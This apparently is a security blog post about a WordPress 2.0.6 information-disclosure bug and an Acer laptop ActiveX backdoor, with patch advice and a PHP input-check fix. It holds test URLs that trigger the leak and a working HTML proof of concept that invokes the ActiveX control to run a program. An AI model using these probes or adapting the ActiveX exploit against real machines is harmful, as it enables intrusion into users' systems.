WordPress 2.0.7 Released
Intro
A serious security vulnerability has been found in WordPress <=2.0.6. This can’t be good for them as they just released 2.0.6 “11 days ago”.
Proof of Concept
http://milw0rm.com/exploits/3109
xy7 found an information disclosure vulnerability in WordPress <= 2.0.6.
It looks like this vulnerability is limited to information leakage only. If you want to test your WP installation see below.
http://my_wordpress/index.php?m[]=
OR
http://my_wordpress/?m[]=
Note: Always make backups before making any changes.
As a temporary fix, ensure that the input passed to the rawurlencode function is a string and not an array, since an array argument is what causes the problem.
If I hear of WordPress releasing an official patch I will update this post.
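The check described above, as an added illustration in PHP (this is not WordPress's own code; the function names are made up): PHP turns a request such as ?m[]= into an array inside $_GET, so the helper coerces the parameter to a string before rawurlencode() ever sees it.

```php
<?php
// Added example, not WordPress code: the helper and function names are made up.
// PHP parses a request like "?m[]=" into an array inside $_GET, and handing that
// array to rawurlencode() produces a warning instead of a string. The temporary
// fix is simply to guarantee that rawurlencode() only ever receives a string.

// Return $value as a plain string; arrays, objects and null fall back to $default.
function param_as_string($value, $default = '')
{
    if (is_array($value) || is_object($value) || $value === null) {
        return $default;
    }
    return (string) $value;
}

// Vulnerable pattern: the raw request value goes straight to rawurlencode(),
// so an array from "?m[]=" triggers the warning. Shown for contrast, not called.
function archive_link_unsafe(array $get)
{
    $m = isset($get['m']) ? $get['m'] : '';
    return '/?m=' . rawurlencode($m);
}

// Hardened pattern: coerce first, so rawurlencode() always sees a string.
function archive_link_safe(array $get)
{
    $m = param_as_string(isset($get['m']) ? $get['m'] : '');
    return '/?m=' . rawurlencode($m);
}

// Constructed inputs, shaped the way PHP would populate $_GET for
// "?m[]=" (array) and "?m=2007/01" (string).
$array_request  = array('m' => array(''));
$string_request = array('m' => '2007/01');

echo archive_link_safe($array_request), "\n";   // array silently dropped
echo archive_link_safe($string_request), "\n";  // value encoded as usual
```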
Is it just me or is it cold in the security room? Has anyone noticed that the security community is having a hard time letting go of “traditional” vulnerabilities and welcoming the new? I am not saying that *Overflows, Format String vulns etc. are finished; in fact I think they will be around for some time. What I am saying is that Web 2.0 is the “new order” on the net. Rich Internet Applications (applications that support the same features as a desktop application) are becoming more and more popular (e.g. Adobe’s Flex 2 RIA framework) and the web is growing with a plethora of development possibilities.
What does this mean? It means a revamp and upgrade of “traditional” hacking terminology. For example, the term “Backdooring” traditionally means: “… a method of bypassing normal authentication or obtaining remote access to a computer, while intended to remain hidden to casual inspection. The backdoor may take the form of an installed program (e.g., Back Orifice) or could be a modification to a legitimate program.” - Wikipedia: Backdoor
So we embed malicious code into a Flash, PDF, DOM, HTML, QuickTime etc. Can this code be used to “bypass normal authentication”? Absolutely. Can it be “hidden from casual inspection”? Certainly.
I think last year we saw a lot of exploitation of the “low-hanging” fruit. Why is this possible in the first place? Because no one has cared until now. We have made a good start, but I fear we are only scratching the surface when it comes to Web 2.0 hacking.
Update: 17/01 - Solution section
I just read an article on Slashdot that really made me stare!
Pop quiz, hot shot: what do you think this is?
<html>
<body>
<!-- instantiates the Acer ActiveX control by its CLSID; the script then calls its Run method -->
<object classid="clsid:D9998BD0-7957-11D2-8FED-00606730D3AA" id="hahaha">
</object>
<script>
hahaha.Run("c", "\\windows\\system32\\calc.exe", "");
</script>
</body>
</html>
This is proof of concept code (thanks to Koyaanisqatsi). It exploits Acer laptops which have apparently been backdoored with an ActiveX control since 1998.
I wonder how many other hardware and software vendors provide such feature-rich facilities.
So if you have an Acer laptop, install Linux. If you want to stick with Windows, use Firefox, because IE (Internet Explorer) is going to get you owned.
A fix has been provided:
http://www.kb.cert.org/vuls/id/221700
Well, if you haven’t upgraded to WordPress 2.0.6 we would recommend you do it now!
There were two critical vulnerabilities found in WordPress <= 2.0.5:
Credits to Stefan Esser [sesser@hardened-php.net]. He seems to have released an advisory for the CSRF and written a PoC exploit for the SQL injection hole. I assume the CSRF hole is the same one that we found last month.